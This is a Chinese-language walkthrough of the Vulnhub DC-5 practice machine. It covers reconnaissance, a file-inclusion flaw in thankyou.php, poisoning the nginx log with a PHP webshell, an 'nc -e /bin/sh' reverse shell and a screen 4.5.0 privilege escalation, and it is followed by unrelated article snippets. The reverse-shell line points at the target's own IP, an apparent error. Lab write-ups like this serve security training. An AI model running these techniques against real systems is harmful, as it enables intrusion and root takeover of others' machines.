【Vulnhub靶场】DC-5

news2024/11/7 7:48:07

DC-5靶机下载地址: https://download.vulnhub.com/dc/DC-5.zip

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

扫描存活主机,扫描端口,扫描服务

第一步使用nmap扫描出目标IP为:192.168.118.142

nmap -sP 192.168.118.0/24
nmap -p- 192.168.118.142
nmap -sV -A 192.168.118.142

这里发现其开放了80端口和111端口

查看web服务,访问http://192.168.118.142

访问网站中各个网页发现/contact.php是一个留言窗口,随便上传点东西自动跳转到/thankyou.php

上传多次发现,页面下方的时间会自动改变

使用whatweb查看网站信息

whatweb http://192.168.118.142

使用dirsraech扫描目录

dirsearch -u http://192.168.118.142

文件包含 

访问 /footer.php,发现里面有一个时间,不断刷新,里面的时间也不段刷新,而且这个时间就前面我们在 /thankyou.php 看到的那个时间刷新

这里猜测在thankyou.php文件中包含footer.php文件,猜测存在着文件包含漏洞

这里在url后面拼接文件,发现有相应回显,确定其存在文件包含漏洞

前面已经知道该网站使用的是nginx1.6.2版本,它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log,我们尝试将木马上传

直接在url中拼接一句话木马发现失败,查看发现是'<' '>'符号被编码

使用burp抓取数据包上传木马

查看日志记录:http://192.168.118.142/thankyou.php?file=/var/log/nginx/error.log,木马是被加载进去了

使用蚁剑连接,这里可能会失败,多连接几次,或者尝试更换一句话木马连接

反弹shell

nc -lvvp 6666

nc -e /bin/sh 192.168.118.142 6666

完成以后不是稳定shell,上传脚本升级为交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

查询一下当前的版本信息 

查询一下寻找有SUID权限的的文件,不显示其他的错误信息

find / -perm -4000 2>/dev/null 

这里发现一个特殊文件,使用 searchsploit(kali自带的漏洞库)搜索 screen 4.5.0 的相关信息

看看此漏洞信息

提权

按照漏洞脚本的提示,我们来创建文件

第一步在桌面创建一个文件夹存放三个部分的脚本

使用命令vim创建第一个libhax.c,将第一部分内容写入到里面

然后编译这个脚本

gcc -fPIC -shared -ldl -o libhax.so libhax.c

使用vim命令创建第二个rootshell.c。将第二部分内容写入里面

再编译

gcc -o rootshell rootshell.c

最后一个部分dc5.sh

删除编译前的文件,最后保留如下三个文件

使用中国蚁剑将上述三个文件直接上传到靶机的 /tmp 目录下

回到kali反弹的shell,进入 /tmp 目录下,给dc5.sh权限,然后运行他

chmod 777 dc5.sh

./dc5.sh

flag

提权成功,最后在/root目录下成功找到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2228943.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

docker 安装kuboard

mkdir /root/kuboard-data docker run --restartunless-stopped -p 8453:80 -d --name kuboard -e KUBOARD_AGENT_SERVER_TCP_PORT8453 -e KUBOARD_ENDPOINThttps://192.168.31.177 -v /root/kuboard-data:/data eipwork/kuboard:v3http://192.168.31.177:8453/ 默认账号&…

SpringBoot和弦:创建Web音乐网站指南

1系统概述 1.1 研究背景 随着计算机技术的发展以及计算机网络的逐渐普及&#xff0c;互联网成为人们查找信息的重要场所&#xff0c;二十一世纪是信息的时代&#xff0c;所以信息的管理显得特别重要。因此&#xff0c;使用计算机来管理音乐网站的相关信息成为必然。开发合适的音…

LinkedList和链表(下)

1. 什么是LinkedList 在练习了单链表的自我实现和单链表的一些习题之后,我们正式来认识一下java提供的LinkedList,这是一种双向链表结构,在增删元素的时候效率比较高,不需要像ArrayList一样搬运元素.但是在查找方面效率比较低(需要遍历链表),ArrayList效率就比较高(直接由数组下…

DevOps赋能:优化业务价值流的实战策略与路径(下)

下篇&#xff1a;加速工作项流动与持续改进优化 —— 跨越差距&#xff0c;迈向卓越交付 在上篇中&#xff0c;我们已经深入探讨了看板方法的四大核心实践&#xff0c;它们共同致力于实现“顺畅且高质量地交付价值”的终极目标。然而&#xff0c;理想与现实之间往往存在一定的…

day14:RSYNC同步

一&#xff0c;概述 概述 rsync &#xff08;开源&#xff09;是一个高效的文件同步和传输工具&#xff0c;广泛用于 Linux 和 Unix 系统中。它可以在本地和远程系统之间同步文件和目录&#xff0c;同时支持增量备份&#xff0c;能够只传输更改过的文件部分&#xff0c;以减少…

Leaflet查询矢量瓦片偏移的问题

1、问题现象 使用Leaflet绘制工具查询出来的结果有偏移 2、问题排查 1&#xff09;Leaflet中latLngToContainerPoint和latLngToLayerPoint的区别 2&#xff09;使用Leaflet查询需要使用像素坐标 3&#xff09;经排查发现&#xff0c;container获取的坐标是地图容器坐标&…

JSP水果商城管理系统WEB项目

一、项目简介 > FruitsDay 是一个用于销售水果的WEB商城项目。 > 该项目主要通过Java和JSP实现&#xff0c;旨在帮助用户实现网购水果&#xff0c;并帮助商家管理水果库存。 > 项目采用Maven构建&#xff0c;使用JSP和Servlet实现&#xff0c;比较适合JAVA初学者…

Rust 力扣 - 1. 两数相加

文章目录 题目描述题解思路题解代码题目链接 题目描述 题解思路 我们使用一个全局的备忘录&#xff0c;然后我们遍历数组&#xff0c;如果当前元素在备忘录里面找到了&#xff0c;就返回备忘录里面记录的下标和当前下标记录&#xff0c;没找到就把当前元素匹配的元素和当前元素…

ssm016基于 Java Web 的校园驿站管理系统(论文+源码)_kaic

毕 业 设 计&#xff08;论 文&#xff09; 题目&#xff1a;校园驿站管理系统的设计与实现 摘 要 互联网发展至今&#xff0c;无论是其理论还是技术都已经成熟&#xff0c;而且它广泛参与在社会中的方方面面。它让信息都可以通过网络传播&#xff0c;搭配信息管理工具可以很好…

NCCL安装(Ubuntu等)

目录 一、NCCL的定义二、安装NCCL的原因1、加速多GPU通信2、支持流行的深度学习框架3、提高计算效率4、易于使用和集成5、可扩展性 三、NCCL安装方法1、下载安装包2、更新APT数据库3、使用APT安装libnccl2包&#xff0c;另外&#xff0c;如果需要使用NCCL编译应用程序&#xff…

Spring的IOC技术(配置文件形式)

目录 一、什么是IOC 二、IOC的程序入门 1.创建mavenJava项目&#xff0c;引入依赖 2.编写接口和实现类 3.编写spring核心配置文件(applicationContext.xml) 4.测试类 5.测试结果-------一个对象 三、Spring框架的Bean管理的配置文件 四、实例化Bean对象的三种方式 1.无…

论文阅读(三十二):EGNet: Edge Guidance Network for Salient Object Detection

文章目录 1.Introduction2.Related Works3.Salient Edge Guidance Network3.1Complementary information modeling3.1.1Progressive salient object features extraction3.1.2Non-local salient edge features extraction 3.2One-to-one guidance module 4.Experiments4.1Imple…

深度学习:卷积神经网络中的img2col

im2col 是一种在卷积神经网络&#xff08;CNN&#xff09;中常用的技术&#xff0c;用于将输入图像数据转换为适合卷积操作的矩阵形式。通过这种转换&#xff0c;卷积操作可以被高效地实现为矩阵乘法&#xff0c;从而加速计算。 在传统的卷积操作中&#xff0c;卷积核&#xff…

java:入门基础(1)

练习一&#xff1a;文字版格斗游戏 需求: ​ 格斗游戏&#xff0c;每个游戏角色的姓名&#xff0c;血量&#xff0c;都不相同&#xff0c;在选定人物的时候&#xff08;new对象的时候&#xff09;&#xff0c;这些信息就应该被确定下来。 举例&#xff1a; ​ 程序运行之后…

计算机毕业设计 | springboot+vue电影院会员管理系统 影院后台管理(附源码)

1&#xff0c;项目背景 随着互联网时代的到来&#xff0c;同时计算机网络技术高速发展&#xff0c;网络管理运用也变得越来越广泛。因此&#xff0c;建立一个B/S结构的电影院会员管理系统&#xff1b;电影院会员管理系统的管理工作系统化、规范化&#xff0c;也会提高影院形象…

TypeScript(中)+算法(二)

文章目录 算法排序冒泡排序选择排序 TS类型声明类型推断类型总览js中的数据类型ts中的数据类型原始类型和包装对象原始类型包装对象自动装箱 常用类型与语法anyunknownnevervoidvoid 与 undefined总结 算法 排序 有十种排序算法&#xff0c;分别是&#xff1a;冒泡排序&#…

算法定制LiteAIServer视频智能分析软件的过亮、过暗及抖动检测应用场景

在现代社会中&#xff0c;视频监控系统扮演着举足轻重的角色&#xff0c;其视频质量直接关乎监控系统的可靠性与有效性。算法定制LiteAIServer通过引入抖动检测和过亮过暗检测功能&#xff0c;为视频监控系统的稳定性和用户体验带来了显著提升。 以下是对这两种功能的技术实现、…

【隐私计算篇】全同态加密应用场景案例(隐私云计算中的大模型推理、生物识别等)

1.题外话 最近因为奖项答辩&#xff0c;一直在忙材料准备&#xff0c;过程非常耗费时间和精力&#xff0c;很难有时间来分享。不过这段时间虽然很忙碌&#xff0c;但这期间有很多新的收获&#xff0c;特别是通过与领域内专家的深入交流和评审过程&#xff0c;对密码学和隐私计算…

elasticsearch 8.x 插件安装(三)之拼音插件

elasticsearch 8.x 插件安装&#xff08;三&#xff09;之拼音插件 elasticsearch插件安装合集 elasticsearch插件安装&#xff08;一&#xff09;之ik分词器安装&#xff08;含MySQL更新&#xff09; elasticsearch 8.x插件&#xff08;二&#xff09;之同义词安装如何解决…

mac-ubuntu虚拟机(扩容-共享-vmtools)

一、磁盘扩容 使用GParted工具对Linux磁盘空间进行扩展 https://blog.csdn.net/Time_Waxk/article/details/105675468 经过上面的方式后还不够&#xff0c;需要再进行下面的操作 lvextend 用于扩展逻辑卷的大小&#xff0c;-l 选项允许指定大小。resize2fs 用于调整文件系统的…